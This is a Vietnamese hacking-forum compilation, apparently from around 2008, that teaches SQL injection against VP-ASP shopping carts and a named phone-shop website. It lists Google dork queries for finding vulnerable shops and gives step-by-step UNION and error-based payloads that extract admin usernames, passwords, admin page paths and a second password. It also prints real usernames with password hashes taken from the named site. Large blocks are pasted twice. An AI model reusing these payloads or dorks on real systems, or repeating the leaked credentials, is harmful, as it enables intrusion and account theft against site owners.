Còn nếu dùng code trên mà nó chưa hiện ra dấu . thì bạn chưa thể khẳng định được, thì hãy tăng lên, thay 9 bằng 11 hoặc 12 v..v.... Cứ thế
Đối với lỗi do cat: có dấu (') trong các truy vấn
//////////Tìm username và pass Admin://////////
Thêm đoạn code này vào sau:
%20union select 1 from tbluser"having 1=1--sp_password
Ta được:
http://www.victim.com/shoping/shopdi...5'%20union select 1 from tbluser"having 1=1--sp_password
Chú ý nó khác với id chỗ này: "having 1=1--sp_password và dấu (') phải có ở trước 20%union !
Thông thường ta thêm:
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from tbluser"having 1=1--sp_password
Phần còn lại giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser"having 1=1--sp_password
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47 from tbluser"having 1=1--sp_password
//////////Tìm link admin ://////////
Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration"having 1=1--sp_password
//////////Tìm Pass 2://////////
Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
Nếu làm như cách này không được thì hãy thay các khoàng trắng bằng %20 và thêm %27 vào sau tbluser hoặc configuration để thử lại ! (Bình thương thì trình duyệt tự nhận %20 là một khoảng trắng và ngược lại) !
II.Cách hack căn bản thứ hai dựa vào lỗi SQL id=?' cat=?': ( Exploit các columns trong các tables của database)
1. Công cụ tìm kiếm site lỗi: Google
2. Từ khóa tìm kiếm:
*
allinurl:"shopdisplayproducts.asp?id=
*
allinurl:"shopdisplayproducts.asp?id=1
*
allinurl:"shopdisplayproducts.asp?id=2
*
allinurl:".com/shopdisplayproducts.asp?id=
*
allinurl:".net/shopdisplayproducts.asp?id=
*
.asp?=catalogid=
*
.asp?cid=
*
alliurl: shop$.asp?$=
*
shopexd.asp?
*
shopreviewlist.asp?id=1
Bước 1 tương tự như trên:
Ví dụ site này:http://www.victimtim.com/shopping/sh...cts.asp?id=153'
Cũng thêm vào dấu phẩy ( ' ) để check lỗi
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''
./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi, giờ sao đây )
Cái này anh em biết khai thác chứ:
Lấy table đầu tiên của CSDL:
%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data typeint
./shopping/shopdisplayproducts.asp, line 93
Bước 2 chắc các bạn biết, chỉ là lấy table thui.
Sau đây là code lấy các table khác ngoài table đầu tiên, mình chỉ việc kiếm table nào chứa users của admin là okie.
%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq','coupons','customerprices','customers') ))--sp_password
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons','customerprices','customer s')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of datatype int
./shopping/shopdisplayproducts.asp, line 93
Tới đây là đã quá rõ, cái mình tìm chính là table này : 'AdminUsers' vì sao vậy vì nó chứa user và pass chắc. " border="0" alt="18.gif" />
Thui cứ khai thác thử.
Ta lấy column của table 'AdminUsers'
Dùng code sau:
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('AdminUsers')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data typeint
./shopping/shopdisplayproducts.asp, line 93
Và bước tiếp theo:
Tìm các columns khác trong table 'AdminUsers' nhưng khác 'AdminID'
Code :
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('AdminUsers') and column_name not in ('AdminID')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' )))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int
./shopping/shopdisplayproducts.asp, line 93
Và các bạn cứ tiếp tục thêm table vào:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' ,'login')))--sp_password
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' ,'login','pwd')))--sp_password
Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass.
Code dùng để exploit 2 columns 'login'và 'pwd' để lấy user và pass trong table 'AdminUsers'
%20and 1=convert(int,(select top 1 login%2b'/'%2bpwd from AdminUsers))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of datatype int
./shopping/shopdisplayproducts.asp, line 93
Hà hà..
user: admin
pass: admin
Bác admin của shop này không biết có bị gì không nữa )
Sử dụng cách này các bạn có thể lấy được tấc cả các table trong batabase của shop. Từ đây lại hình thành một cách mới để tìm link admin.
Mặc dù nói thì dễ vậy nhưng làm thì cần một thứ nữa, đó chính là lỗi file shopexd.asp . Nếu bạn vào trang này bị lỗi thì có hy vọng lấy được link admin.
Dùng đoạn lệnh gộp sau đây:
union select table1,fieldvalue,table2,table3,table4,table5,tabl e6,table7,table8,table9,table10,table11,table12,ta ble13,configuration where fieldname='xadminpage' and catalogid=153
Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Thực hiện lệnh này xong ta sẽ có link admin ngay
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
1=convert(int,(select top 1 fieldvalue from configuration where fieldname='xadminpage'))--sp_password
Đối với cat=?' các bạn làm tương tự ( vận dụng sáng tạo từ bài viết trên ^\^)
url:http://danviet.biz/forum/showthread.php?t=697
2. Từ khóa tìm kiếm:
*
allinurl:"shopdisplayproducts.asp?id=
*
allinurl:"shopdisplayproducts.asp?id=1
*
allinurl:"shopdisplayproducts.asp?id=2
*
allinurl:".com/shopdisplayproducts.asp?id=
*
allinurl:".net/shopdisplayproducts.asp?id=
*
.asp?=catalogid=
*
.asp?cid=
*
alliurl: shop$.asp?$=
*
shopexd.asp?
*
shopreviewlist.asp?id=1
3. Thông thường ta thực hiện 3 giai đoạn sau:
* Tìm UserName và PassAdmin
* Tìm Link Admin
* Tìm Pass 2 nếu có
Tìm Shop lỗi
Thêm dấu (') vào sau: http://www.victim.com/shoping/shopdisplayp...s.asp?id=5'
Báo lỗi :
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'ccategory = 1' Order
By specialOffer DESC, cname'
./shopping/shop$db.asp, line 657
Nếu không thấy lỗi, thay id bằng cat: http://www.victim.com/shoping/shopdisplayp....asp?cat=5'
Có lỗi rùi :
Microsoft JET database Engine error '80040e014'
Syntax error in query expression 'ccintcatalogid=p.catalogid and cc.intcategory=c.categoryid and c.catdescription like'5%'
and hide=0 order by specialoffer DESC, cname'
./shopping/shop$db.asp, line 564
Chú ý khi về 2 trường hợp trên : (Quan trọng)
* Nếu lỗi là id trong các truy vấn bên dưới không có dấu (') theo sau số id
* Nếu lỗi là cat thì cần có thêm dấu (') theo sau trong các truy vấn bên dưới
Đối với lỗi do id: không có dấu (') trong các truy vấn
//////////Tìm username và pass Admin://////////
Thêm đoạn code này vào sau:
%20union select 1 from tbluser'
Thông thường ta thêm: (có lẽ các bạn đã hiểu là vì sao nên không nói dài dòng nữa)
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser'
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from tbluser'
Thêm cho đến khi nào xuất một trang bình thường và không còn báo lỗi nữa. Trên trang xuất hiện mấy con số lạ. Thông thường là số 3, 4, 22, 18
Ta thay con số 3 bằng đoạn mã sau để lấy user và pass admin:
fldusername%2b'/'%2bfldpassword
Ta có được:
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser'
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47 from tbluser'
Số 3 bây giờ sẽ là: usernameadmin/passadmin
Ví dụ như : kakaka/maiyeuem
//////////Tìm link admin ://////////
Link mặc định là shopadmin.asp, shopadmin1.asp. Nếu không được thì đành tự kiếm !
Nó nằm tại bảng configuration. Vẫn giữ nguyên số cột mà bạn đã khai thác được, thay column đầu bằng:
fieldname='xadminpage'
Thay column lỗi muốn hiển thị bằng:
fieldvalue (ở đây là số 3)
Ta được như sau (một trong hai):
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from configuration'
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration'
Chú ý: Có thể thay giá trị fieldvalue vào số 3, 4, hay 22 gì tùy bạn. Không bắc buộc là số 3 ! Theo ví dụ này mình cho vô số 3 ^^
1 là bạn gặp 1 trang trên có mấy con số như : Page 1 of 10
Hãy cố gắng tìm trong 10 trang đó sẽ có 1 trang chứa link admin. Bạn tìm được các trang có đuôi dạng *.asp
2 là bạn gặp thông báo lỗi:
The Microsoft Jet database engine cannot find the input table or query 'configuration'. Make sure it exists and that its name is spelled correctly.
Hic...victim đã xóa mất bảng config và hết lấy link admin !
//////////Tìm Pass 2://////////
Nếu bạn có link admin, nhưng shop này nó đòi cái pass 2 nữa ! Quỹ quái thật
Không có gì khó, nhưng bạn phải xem trang đó có bị lỗi tại page: shopexd.asp hay không, nếu không kiếm pass 2 ngay !
Dùng đoạn code này:
shopexd.asp?id=1%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,fieldvalue,28,29,30,31,32,33,34 ,35,36,37 from configuration where field name='xadminpage'
Hoặc:
shopexd.asp?id=1%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,fieldvalue ,28,29,30,31,32,33,34,35,36,37 from configuration'
Giả sử tại page này column 20 bị lỗi
Dùng code như khi kiếm link admin tại chỗ này:
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration'
Rồi, nếu ok nó sẽ sổ ra mã nguồn asp của trang admin, và bạn sẽ nhìn thấy pass 2 tại dòng lênh: Const SecondPassword="pass 2"
Tiếp, nếu bạn muốn tìm link admin tại page này thì phải dùng code sau:
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration'
Nếu nó vẫn ra mã nguồn, thì nghĩa là số kí tự của link admin nhỏ hơn 9 hoặc bằng 9, bạn thay 9 bằng số 7.
-> giả sử nó sẽ hiện ra thế này: shoa.as Nhìn thế này thì đủ biết link admin là gì rồi.
Còn nếu dùng code trên mà nó chưa hiện ra dấu . thì bạn chưa thể khẳng định được, thì hãy tăng lên, thay 9 bằng 11 hoặc 12 v..v.... Cứ thế
Đối với lỗi do cat: có dấu (') trong các truy vấn
//////////Tìm username và pass Admin://////////
Thêm đoạn code này vào sau:
%20union select 1 from tbluser"having 1=1--sp_password
Ta được:
http://www.victim.com/shoping/shopdi...5'%20union select 1 from tbluser"having 1=1--sp_password
Chú ý nó khác với id chỗ này: "having 1=1--sp_password và dấu (') phải có ở trước 20%union !
Thông thường ta thêm:
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7 from tbluser"having 1=1--sp_password
%20union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47 from tbluser"having 1=1--sp_password
Phần còn lại giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37 from tbluser"having 1=1--sp_password
%20union select 1,2,fldusername%2b'/'%2bfldpassword,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47 from tbluser"having 1=1--sp_password
//////////Tìm link admin ://////////
Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
%20union select fieldname='xadminpage',2,fieldvalue,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47 from configuration"having 1=1--sp_password
//////////Tìm Pass 2://////////
Giống với phần hướng dẫn với id ở trên. Khác ở chỗ là có "having 1=1--sp_password ở sau và dấu (') phải có ở trước 20%union !
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,fieldvalue,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
%20union select fieldname='xadminpage',2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,left(fieldvalue,9),21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37 from configuration"having 1=1--sp_password
Nếu làm như cách này không được thì hãy thay các khoàng trắng bằng %20 và thêm %27 vào sau tbluser hoặc configuration để thử lại ! (Bình thương thì trình duyệt tự nhận %20 là một khoảng trắng và ngược lại) !
II.Cách hack căn bản thứ hai dựa vào lỗi SQL id=?' cat=?': ( Exploit các columns trong các tables của database)
1. Công cụ tìm kiếm site lỗi: Google
2. Từ khóa tìm kiếm:
*
allinurl:"shopdisplayproducts.asp?id=
*
allinurl:"shopdisplayproducts.asp?id=1
*
allinurl:"shopdisplayproducts.asp?id=2
*
allinurl:".com/shopdisplayproducts.asp?id=
*
allinurl:".net/shopdisplayproducts.asp?id=
*
.asp?=catalogid=
*
.asp?cid=
*
alliurl: shop$.asp?$=
*
shopexd.asp?
*
shopreviewlist.asp?id=1
Bước 1 tương tự như trên:
Ví dụ site này:http://www.victimtim.com/shopping/sh...cts.asp?id=153'
Cũng thêm vào dấu phẩy ( ' ) để check lỗi
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ''
./shopping/shopdisplayproducts.asp, line 93
Oh có lỗi rồi, giờ sao đây )
Cái này anh em biết khai thác chứ:
Lấy table đầu tiên của CSDL:
%20and 1=convert(int,(select top 1 table_name from information_schema.tables))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'ver_Faq' to a column of data typeint
./shopping/shopdisplayproducts.asp, line 93
Bước 2 chắc các bạn biết, chỉ là lấy table thui.
Sau đây là code lấy các table khác ngoài table đầu tiên, mình chỉ việc kiếm table nào chứa users của admin là okie.
%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq')))--sp_password
%20and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('ver_Faq','coupons','customerprices','customers') ))--sp_password
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20table_name%20from%20informa tion_schema.tables%20where%20table_name%20not%20in %20('ver_Faq','coupons','customerprices','customer s')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminUsers' to a column of datatype int
./shopping/shopdisplayproducts.asp, line 93
Tới đây là đã quá rõ, cái mình tìm chính là table này : 'AdminUsers' vì sao vậy vì nó chứa user và pass chắc. " border="0" alt="18.gif" />
Thui cứ khai thác thử.
Ta lấy column của table 'AdminUsers'
Dùng code sau:
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('AdminUsers')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'AdminID' to a column of data typeint
./shopping/shopdisplayproducts.asp, line 93
Và bước tiếp theo:
Tìm các columns khác trong table 'AdminUsers' nhưng khác 'AdminID'
Code :
%20and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('AdminUsers') and column_name not in ('AdminID')))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' )))--sp_password
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login' to a column of data type int
./shopping/shopdisplayproducts.asp, line 93
Và các bạn cứ tiếp tục thêm table vào:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' ,'login')))--sp_password
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20column_name%20from%20inform ation_schema.columns%20where%20table_name=('AdminU sers')%20and%20column_name%20not%20in%20('AdminID' ,'login','pwd')))--sp_password
Okie 2 thông tin quan trọng là 'login','pwd' đă xuất hiện giờ chỉ việc kiếm pass.
Code dùng để exploit 2 columns 'login'và 'pwd' để lấy user và pass trong table 'AdminUsers'
%20and 1=convert(int,(select top 1 login%2b'/'%2bpwd from AdminUsers))--sp_password
Khi thêm code xong sẽ như thế này:
http://www.victimtim.com/shopping/sh...%201=convert(i nt,(select%20top%201%20login%2b'/'%2bpwd%20from%20AdminUsers))--sp_password
Products
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin/admin' to a column of datatype int
./shopping/shopdisplayproducts.asp, line 93
Hà hà..
user: admin
pass: admin
Bác admin của shop này không biết có bị gì không nữa )
Sử dụng cách này các bạn có thể lấy được tấc cả các table trong batabase của shop. Từ đây lại hình thành một cách mới để tìm link admin.
Mặc dù nói thì dễ vậy nhưng làm thì cần một thứ nữa, đó chính là lỗi file shopexd.asp . Nếu bạn vào trang này bị lỗi thì có hy vọng lấy được link admin.
Dùng đoạn lệnh gộp sau đây:
union select table1,fieldvalue,table2,table3,table4,table5,tabl e6,table7,table8,table9,table10,table11,table12,ta ble13,configuration where fieldname='xadminpage' and catalogid=153
Sở dĩ ta phải cho id=-1 để ngắt lệnh SQL thứ nhất khi hợp nhất thì nó sẽ thực hiện lệnh SQL thứ hai.
Thực hiện lệnh này xong ta sẽ có link admin ngay
Site VPASP sử dụng cơ sở dữ liệu SQL - Server thì quá dễ để khai thác như sau
1=convert(int,(select top 1 fldusername%2b'/'%2bfldpassword from tbluser))--sp_password
1=convert(int,(select top 1 fieldvalue from configuration where fieldname='xadminpage'))--sp_password
Đối với cat=?' các bạn làm tương tự ( vận dụng sáng tạo từ bài viết trên ^\^)
url:http://danviet.biz/forum/showthread.php?t=697
[Tut] Blind sql injection : DiemSangViet.Net
quangvu
05-08-2008, 09:10 AM
Khai trương cho box.
Bài này thực ra là 1 bài khá căn bản, các bạn có thể tìm đọc hướng dẫn tươg tự rất nhiều trên internet.
Tut by: talama3000[at]VBF[dot]NET
Tham khảo tại milw0rm: SQL Injection Tutorial by Marezzi (MySQL) : http://www.milw0rm.com/papers/202
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
http://gdataonline.com/
Hello mọi người
hôm nay dạo chơi một vòng thấy có site Http://DiemSangViet.net nó bị lỗi nên em làm cái tut
lần đầu làm tut mong mọi người thông cảm nhé
Victim:Http://DiemSangViet.Net
cái site đó toàn điện thoại di đông hem biết đã có anh nào check chưa
em vào đó chơi tí
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90
site này nó bằng php
giờ thử check bằng and 1=1 và and 1=0 xem có gì không
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=0
mọi người xem có gì khác biệt không
giờ thử đếm bằng order by xx--
xx là một số nào đó
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 order by 20--
ở đây em cứ thử đếm từ 20 đổ về 0
đếm đến 3 thì thấy nó trở về như cái
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1
tiếp nào
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,2,3--
mọi người thấy gì chưa
nó hiện ra số 2 đẹp ghê
tìm version
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,version(),3--
Quote:
5.0.27
có thể dùng information.... được
giờ tìm table_name
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,table_name,3%20from%2 0information_schema.tables--
Điện thoại vỏ gỗ-Mobiado
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
counter
df_cate
df_user
plus_poll
plus_poll_ans
tbl_banner
tbl_cart
tbl_category
tbl_contact
tbl_counter
tbl_faq
tbl_group
tbl_groupnew
tbl_intro
phát ra luôn
nhìn thấy cái
df_user
hay hay giờ thử chuyển nó sang ascii xem
dùng web
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
để chuyển
và nó đây
Quote:
100, 102, 95, 117, 115, 101, 114
giờ tìm colum_name
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,column_name,3%20from% 20information_schema.columns%20where%20table_name= %20char(100,%20102,%2095,%20117,%20115,%20101,%201 14)%20--
Điện thoại vỏ gỗ-Mobiado
user_id
user_name
user_password
user_regdate
giờ lấy thông tin thôi
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,concat(user_name,char(47),user_password ),3 from df_user --
char(58) = dấu /
kết quả
acc/pass
winman/14ddd4dd79acd79cf361b4b384e40c7d
acc/pass
guest/e10adc3949ba59abbe56e057f20f883e
nhìn cái pass e10adc3949ba59abbe56e057f20f883e quen quen nó là 123456
còn cái 14ddd4dd79acd79cf361b4b384e40c7d em đã thử dùng gdataonlin.com nhưng không được
anh nào crack được pass thì cho em biết với nhé
link admin:
http://diemsangviet.net/admin
url: http://ddcntt.vn/forum/archive/index.php/t-1466.html
Bài này thực ra là 1 bài khá căn bản, các bạn có thể tìm đọc hướng dẫn tươg tự rất nhiều trên internet.
Tut by: talama3000[at]VBF[dot]NET
Tham khảo tại milw0rm: SQL Injection Tutorial by Marezzi (MySQL) : http://www.milw0rm.com/papers/202
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
http://gdataonline.com/
Hello mọi người
hôm nay dạo chơi một vòng thấy có site Http://DiemSangViet.net nó bị lỗi nên em làm cái tut
lần đầu làm tut mong mọi người thông cảm nhé
Victim:Http://DiemSangViet.Net
cái site đó toàn điện thoại di đông hem biết đã có anh nào check chưa
em vào đó chơi tí
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90
site này nó bằng php
giờ thử check bằng and 1=1 và and 1=0 xem có gì không
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=0
mọi người xem có gì khác biệt không
giờ thử đếm bằng order by xx--
xx là một số nào đó
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 order by 20--
ở đây em cứ thử đếm từ 20 đổ về 0
đếm đến 3 thì thấy nó trở về như cái
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 and 1=1
tiếp nào
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,2,3--
mọi người thấy gì chưa
nó hiện ra số 2 đẹp ghê
tìm version
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90 union select 1,version(),3--
Quote:
5.0.27
có thể dùng information.... được
giờ tìm table_name
http://diemsangviet.net/?module=sanpham&pcat=1&loai=90%20union%20select%201,table_name,3%20from%2 0information_schema.tables--
Điện thoại vỏ gỗ-Mobiado
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
counter
df_cate
df_user
plus_poll
plus_poll_ans
tbl_banner
tbl_cart
tbl_category
tbl_contact
tbl_counter
tbl_faq
tbl_group
tbl_groupnew
tbl_intro
phát ra luôn
nhìn thấy cái
df_user
hay hay giờ thử chuyển nó sang ascii xem
dùng web
http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
để chuyển
